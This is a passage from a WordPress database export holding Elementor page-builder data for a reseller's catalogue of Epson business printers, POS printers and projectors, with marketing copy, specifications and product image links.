Full HD resolution, its versatile connectivity also gives you great functionality.<\\/p><ul><li>Pixels: 2MP (1920 x 1080 pixels)<\\/li><li>Camera Sensor: 1\\/2.7 inch CMOS Sensor<\\/li><li>Resolution: Up to Full HD (1080p)<\\/li><li>Zoom: 10x Digital Zoom, 12x Optical Zoom<\\/li><li>Weight: Approx 3.0kg<\\/li><\\/ul><p>To discover more, please click the button below or contact us to discuss your needs.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d5e60a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b6a1050\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(3963,2752,'_elementor_version','0.4'),(3966,2753,'_edit_lock','1545633234:1'),(3967,2753,'_edit_last','1'),(3968,2753,'_wp_page_template','template-fullwidth.php'),(3969,2753,'_hide_page_title',''),(3970,2753,'_hide_header',''),(3971,2753,'_hide_footer',''),(3972,2753,'_hide_breadcrumb',''),(3973,2753,'_cover',''),(3974,2753,'_show_excerpt',''),(3975,2753,'_wc_apply_product',''),(3976,2753,'_yoast_wpseo_content_score','90'),(3977,2756,'_wp_page_template','template-fullwidth.php'),(3978,2756,'_elementor_edit_mode','builder'),(3979,2756,'_elementor_template_type','post'),(3980,2756,'_elementor_data','[{\"id\":\"0bcf275\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"829ac8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2449815\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>As a global technology leader, Epson creates and delivers technology solutions for businesses and consumers, from inkjet printers and digital printing systems to 3LCD projectors, smart glasses, sensing systems and industrial robots. The company is focused on driving innovations and exceeding customer expectations in inkjet, visual communications, wearables and robotics.<\\/p><h3>Printers for Work<\\/h3><p>Epson has the best printers for your business requirements regardless documents, photos, receipts, large-formats, labels, or even apparels.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2698f52\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"93fa1d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f872ca9\",\"elType\":\"widget\",\"settings\":{\"title\":\"BUSINESS INKJET PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2a74bb0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"245ffff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"12a92f5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson WorkForce Enterprise WF-C17590\\u00a0<img class=\\\"alignnone wp-image-2417\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Enterprise-WF-C17590.jpg\\\" alt=\\\"\\\" width=\\\"366\\\" height=\\\"207\\\" \\/><\\/p><p>Our massive investment in revolutionary technologies enables us to pay attention to every minute detail. PrecisionCore\\u2122, our next generation, high-density printhead, takes a great leap forward in enterprise printing. Epson WorkForce Enterprise WF-C17590 has arrived, giving you exactly what you need: superior quality, excellent connectivity and prints at lightning fast speed.<\\/p><ul><li>4-in-1 Network MFP: Print | Copy | Scan | Fax<\\/li><li>Ink: DURABrite<sup>TM<\\/sup>\\u00a0Pro pigment ink cartridges<\\/li><li>ISO Print Speed: 75 ISO ppm (black\\/colour) simplex\\/duplex<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"3a12efc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ffeb9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson WorkForce Pro WF-C5290\\u00a0<img class=\\\"alignnone wp-image-2418\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-Pro-WF-C5290.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Enjoy low-cost, reliable printing with Epson WorkForce Pro WF-C5290 business printer. Delivering fast print speeds of up to 24ipm with a first page-out time of just 4.8 seconds, it is built to handle the most demanding print jobs. With a range of printing and connectivity features, this printer is the ideal solution for small workgroups that require hassle-free, low-maintenance and productive-boosting printing.<\\/p><ul><li>High yield ink packs<\\/li><li>High-speed auto-duplex printing<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Epson Connect<\\/li><li>Energy\\u00a0saving<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"94b61d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b740aaa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson WorkForce WF-100\\u00a0<img class=\\\"alignnone wp-image-2419\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-100.png\\\" alt=\\\"\\\" width=\\\"378\\\" height=\\\"213\\\" \\/><\\/p><p>Introducing the Epson WorkForce WF-100, a lightweight portable inkjet printer designed for professionals on the go. Battery-operated with integrated wireless capabilities such as Wi-Fi Direct and Epson Connect, you can have quality colour printouts anytime, anywhere.<\\/p><ul><li>Print speed up to 14 ppm<\\/li><li>Epson Connect<\\/li><li>1.44 Colour LCD Panel<\\/li><li>Wi-Fi and Wi-Fi Direct connectivity<\\/li><li>Built-in battery<\\/li><\\/ul><p>[maxbutton id=\\\"12\\\" ]<\\/p>\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2b0e3f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"e754d94\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fc3866b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson WorkForce WF-7711\\u00a0<img class=\\\"alignnone wp-image-2420\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-WF-7711.png\\\" alt=\\\"\\\" width=\\\"304\\\" height=\\\"172\\\" \\/><\\/p><p>Change the way you print A3+ business documents with the Epson WorkForce WF-7711 printer. Designed for convenience, this smart printer is equipped with a suite of connectivity features, from USB and Ethernet to Wi-Fi Direct and NFC. With PrecisionCore<sup>TM<\\/sup>\\u00a0technology, fast printing speed consistently delivers success in every detail.<\\/p><ul><li>Print speeds up to 18ipm for black and 10ipm for colour<\\/li><li>USB, Ethernet, Wi-Fi, Wi-Fi Direct and NFC<\\/li><li>Duplex printing up to A3 size<\\/li><li>Epson DURABrite<sup>TM<\\/sup>\\u00a0Ultra ink<\\/li><li>4.3\\u201d Colour LCD Touch Panel<\\/li><li>Print, Scan, Copy Fax with ADF<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5178d20\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b031280\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"b3a013d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f2b7b04\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"732a1a6\",\"elType\":\"widget\",\"settings\":{\"title\":\"INK TANK SYSTEM\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e709cb3\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"60cd262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97d2102\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EcoTank L3150\\u00a0<img class=\\\"alignnone wp-image-2421\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EcoTank-L3150-.jpg\\\" alt=\\\"\\\" width=\\\"311\\\" height=\\\"175\\\" \\/><\\/p><p>Save more with Epson\\u2019s economical and multifunctional printing solutions for business\\u2014the EcoTank L3150\\u2014built to bring down costs, and bring up productivity. The integrated ink tank enables spill-free, error-free refilling with individual bottles that have designated nozzles. Other features include borderless 4R printing and an ultra-high yield of 7,500 coloured and 4,500 black-and-white pages. The EcoTank L3150 also delivers the convenience of wireless connectivity, allowing direct printing from smart devices.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High yield ink bottles<\\/li><li>Spill-free, error-free refilling<\\/li><li>Wi-Fi, Wi-Fi Direct<\\/li><li>Epson Connect (Epson iPrint, Epson Email Print and Remote Print Driver)<\\/li><li>Borderless printing up to 4R<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"63366b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8449cce\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson L120 Printer\\u00a0<img class=\\\"alignnone wp-image-2422\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L120-Printer.png\\\" alt=\\\"\\\" width=\\\"301\\\" height=\\\"170\\\" \\/><\\/p><p>The Epson L120 ink tank system printer brings speedy performance with low running costs to all your personal and work projects.<\\/p><ul><li>High-yield ink bottles<\\/li><li>Print speed up to 8.5ipm for black-and-white and 4.5ipm for color<\\/li><li>Compact Size<\\/li><li>Warranty of 2 Years or 20,000 Pages, whichever comes first<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7d56d33\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a539e2b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson M1100 Printer\\u00a0<img class=\\\"alignnone wp-image-2423\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-M1100-Printer-.png\\\" alt=\\\"\\\" width=\\\"315\\\" height=\\\"178\\\" \\/><\\/p><p>Efficiency\\u00a0meets economy with the EcoTank monochrome M1100 printer. Look forward to lower business costs with bottles that provide an ultra-high page yield of up to 6,000 pages\\u00a0each. Simplify processes with the integrated ink tank that enables spill - and error-free ink refilling, and enjoy laser-quality text that is smudge-proof and water-resistant with the pigment ink.<\\/p><ul><li>Compact integrated tank design<\\/li><li>High-yield pigment ink bottle<\\/li><li>Spill-free, error-free refilling<\\/li><li>Print speed up to 32ppm (15ipm)<\\/li><li>4 years warranty<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ffcc87\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c140b6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b3a6fcb\",\"elType\":\"widget\",\"settings\":{\"title\":\"LASER PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a7c8449\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"650cf58\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"82105a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson AcuLaser C9300N\\u00a0<img class=\\\"alignnone wp-image-2424\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-AcuLaser-C9300N.png\\\" alt=\\\"\\\" width=\\\"313\\\" height=\\\"177\\\" \\/><\\/p><p>The Epson AcuLaser\\u2122 C9300N breaks new ground with its class-leading 1200dpi standard resolution for A3 colour laser printing. Together with its fast speed and high reliability, it packs superior performance in a cost efficient design that perfectly complements the needs of demanding workgroups.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Speed: Up to 30ppm<\\/li><li>First page out in 8.3 sec or less (mono A4), 9.9 sec (colour A4)<\\/li><li>Quality prints with new Epson Technologies<\\/li><li>New print job management features<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"8295a6c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"22e2324\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0Epson WorkForce AL-M320DN\\u00a0<img class=\\\"alignnone wp-image-2426\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M320DN-.jpg\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"296\\\" \\/><\\/p><p>The Workforce AL-M320DN delivers absolute performance and reliability despite their compact size. Equipped with network printing capabilities and blazing fast performance to support ultra-high volume printing, these printers are built for the most demanding office environments. Further boost productivity with the free fleet management software, Epson Device Admin, to organise and monitor printers remotely.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 35ppm<\\/li><li>Auto-Duplex<\\/li><li>Ethernet &amp; Epson iPrint<\\/li><li>2 optional paper cassette tray<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49ae59d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6612146\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson WorkForce AL-M8100DN\\u00a0<img class=\\\"alignnone wp-image-2427\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-WorkForce-AL-M8100DN-.png\\\" alt=\\\"\\\" width=\\\"256\\\" height=\\\"144\\\" \\/><\\/p><p>Unleash remarkable efficiency to your workflow. Powered by a 600Mhz dual core processor, the WorkForce AL-8100DN delivers quality A3 and A4 prints with swift speeds of up to 40ppm and is packed with 1GB RAM for faster processing of multiple print jobs.<\\/p><ul><li>1200 x 1200 dpi<\\/li><li>Print speed up to 40 ppm<\\/li><li>Epson iPrint<\\/li><li>Ethernet<\\/li><li>4 optional cassette trays<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3590c0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7139e3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"77f919a\",\"elType\":\"widget\",\"settings\":{\"title\":\"POS PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6011ab1\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"751b93e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"14d70f4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson TM-H6000IV\\u00a0<\\/p><p><img class=\\\"alignnone wp-image-2428\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-H6000IV.png\\\" alt=\\\"\\\" width=\\\"224\\\" height=\\\"125\\\" \\/><\\/p><p>The Epson multifunction POS printer TM-H6000IV, features everything retailers need from fast receipt printing and check processing to best-in-class reliability.<\\/p><ul><li>Thermal &amp; Dot Output<\\/li><li>Speed: Up to 300mm\\/sec<\\/li><li>Check printing<\\/li><li>Bi-directional printing<\\/li><li>Supports\\u00a0slip printing, validation and endorsement print<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"48313a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"04c8d3f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson TM-T88V-i\\u00a0<img class=\\\"alignnone wp-image-2429\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T88V-i.png\\\" alt=\\\"\\\" width=\\\"243\\\" height=\\\"137\\\" \\/><\\/p><p>Create a world of possibilities with TM-T88V-i Intelligent Solution. Equipped with cloud and web-capabilities, you\'ll have access to a variety of intelligent functions delivered by a compact, space-saving printer that fits easily into your business.<\\/p><ul><li>Printing speed of up to 300mm\\/second<\\/li><li>20 million lines for printer mechanism<\\/li><li>Up to 2 million for auto-cutter<\\/li><li>LAN, Serial, USB 2.0 (Type A) x 4<\\/li><li>Control peripherals easily<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a458653\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"693238f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson TM-T70II\\u00a0<img class=\\\"alignnone wp-image-2430\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-TM-T70II.png\\\" alt=\\\"\\\" width=\\\"254\\\" height=\\\"143\\\" \\/><\\/p><p>The Epson\'s TM-T70II is the smallest in class receipt printer with a full frontal operation.<\\/p><ul><li>Print method: Thermal line printing<\\/li><li>Width: 79\\u00a0\\u00b1\\u00a00.5 mm<\\/li><li>Print Speed: Up to 250 mm\\/ sec<\\/li><li>Auto-cutter feature<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"633089e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e7998e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ca5c009\",\"elType\":\"widget\",\"settings\":{\"title\":\"PHOTO PRINTER\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e7182b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"7eee589\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c63255\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson L1800 A3 Photo Ink Tank Printer<\\/p><p><img class=\\\"alignnone size-full wp-image-2431\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L1800-Printer.png\\\" alt=\\\"\\\" width=\\\"550\\\" height=\\\"310\\\" \\/><\\/p><p>In creating the next wave of printing innovation, Epson introduces the worlds first truly affordable 6-colour A3+ original ink tank system printer.<\\/p><ul><li>Yield of up to 1,500 4R photos<\\/li><li>Print speed up to 15ppm<\\/li><li>High-yield ink bottles<\\/li><li>1-year warranty or 9,000 prints<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4abe3ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9645bf2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson L850 Printer\\u00a0<img class=\\\"alignnone wp-image-2432\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L850-Printer.png\\\" alt=\\\"\\\" width=\\\"261\\\" height=\\\"147\\\" \\/><\\/p><p>Imaging enthusiasts and professionals can look forward to the 6-colour ink tank system, presenting vibrant borderless prints and unrivalled performance at a remarkably low cost through this 3-in-1 photo printer.<\\/p><ul><li>High-yield ink bottles<\\/li><li>2.7 colour LCD screen<\\/li><li>Direct printing via memory card slot, USB port and PictBridge<\\/li><li>CD\\/DVD printing<\\/li><li>Warranty of 1 year or 3,000 photo prints, whichever comes first<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07c207b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8ce4aa3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson L805 Printer\\u00a0<img class=\\\"alignnone wp-image-2433\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-L805-Printer-.png\\\" alt=\\\"\\\" width=\\\"240\\\" height=\\\"135\\\" \\/><\\/p><p>The L805s integrated Wi-Fi support and expanded colour gamut of 6 inks brings you ease of printing from your mobile devices over a wireless network so you can print low-cost, lab-quality photos at your convenience.<\\/p><ul><li>Yield of Up to 1,800 4R photos<\\/li><li>Lowest Printing Costs<\\/li><li>Wi-Fi &amp; Epson iPrint<\\/li><li>CD\\/DVD Printing Capability<\\/li><li>1 year or 3,000 prints warranty<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"65279bf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c65e6e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"57b8f7e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Projectors for Work\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bbe338f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4e4173d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"1c6bf5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"CORPORATE AND EDUCATION\\u00a0\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7e9242e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"61d6693\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"bd3c8b4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-2055<img class=\\\"alignnone wp-image-2434\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2055.png\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"163\\\" \\/><\\/p><p>Leave the lights on and take control whether in the meeting room or classroom. Epson\\u2019s EB-2055 projector is engineered to shine outstandingly even in well-lit environments to enrich your presentation experience. Your brilliant presentations are made even better and more convenient with the new gesture-control function that allows you to navigate between your slides without the use of a peripheral device.<\\/p><ul><li>XGA Resolution<\\/li><li>White and Colour Light Output at 5,000 lumens<\\/li><li>Gesture Presenter<\\/li><li>Multi-PC Projection<\\/li><li>2 x HDMI<\\/li><li>Split Screen<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9b5eee\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe4d6fd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-2142W\\u00a0<img class=\\\"alignnone wp-image-2435\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-2142W.jpg\\\" alt=\\\"\\\" width=\\\"245\\\" height=\\\"138\\\" \\/><\\/p><p>Enjoy success and unparalleled performance with Epson business projectors. Fully maximise your office space and experience a variety of connectivity options for your ultimate convenience. Along with long lamp-life and maintenance cycles, potential for saving costs and improving energy efficiency is now made possible for you. Every component is skillfully innovated with attention to detail in mind, including the integrated 3LCD technology that will provide you with stunning colour brightness for quality images.<\\/p><ul><li>White and Colour Brightness at 4,200lm<\\/li><li>WXGA Resolution<\\/li><li>12000 hours lamp life in eco-mode<\\/li><li>MHL-enabled<\\/li><li>Multi-PC Projection<\\/li><li>Horizontal Keystone Slider<\\/li><li>Miracast<sup>\\u00ae<\\/sup><\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<span style=\\\"font-size: 10.5px;\\\"><br \\/><\\/span><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24b65ae\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a26a32f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson EB-L500W\\u00a0<img class=\\\"wp-image-2436 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-EB-L500W.jpg\\\" alt=\\\"\\\" width=\\\"251\\\" height=\\\"142\\\" \\/><\\/p><p>The compact, affordable EB-L500W laser projector delivers powerful performance for education and business applications. Get bright, vivid images with 5,000 lumens colour\\/white brightness. This wireless projector also offers WXGA resolution and Full HD support. Featuring breakthrough laser technology, it delivers a laser light source of up to 20,000 hours. And, it offers virtually maintenance-free operation for the life of the optical engine. Plus, it features a Dynamic contrast ratio of up to 2,500,000:1. It also includes wireless networking with enterprise-level security, and advanced installation features.<\\/p><ul><li>5,000 lumens colour\\/white brightness<sup>\\u00a0<\\/sup><\\/li><li>Colourful WXGA; up to 2,500,000:1 Dynamic contrast ratio<\\/li><li>Laser light source of up to 20,000 hours<\\/li><li>Virtually maintenance-free for optical engine life<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" ]<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cd625e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8750887\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"c4ec64b\",\"elType\":\"widget\",\"settings\":{\"title\":\"ACCENT LIGHTING LASER PROJECTORS\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5f02a57\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"993393a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e46d09c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Epson LightScene EV-105<\\/p><p><img class=\\\"wp-image-2437 aligncenter\\\" src=\\\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/Epson-LightScene-EV-105.jpg\\\" alt=\\\"\\\" width=\\\"263\\\" height=\\\"176\\\" \\/><\\/p><p>Create stunning visual displays and immersive environments with the LightScene EV-105, the cutting-edge digital signage solution from Epson. A convergence of lighting and display technology, LightScene laser projectors captivate audiences by simultaneously illuminating and projecting on virtually any surface or material, unleashing dynamic, experiential content for digital art, commercial signage and d\\u00e9cor applications. Designed to blend in discreetly to any setting \\u2014 from retail, hospitality and event spaces to showrooms and museums \\u2014 LightScene EV-105 offers a sleek, black spotlight design, with an array of configuration, mounting and programming options.<\\/p><ul><li>Laser projector for digital art and signage<\\/li><li>Seamlessly blends into virtually any environment<\\/li><li>Up to 20,000 hours of virtually maintenance-free operation<\\/li><li>360-degree mounting: floors, walls or ceilings<\\/li><li>Remote management and control tools<\\/li><li>Best New Award Overall<\\/li><\\/ul><div>[maxbutton id=\\\"12\\\" 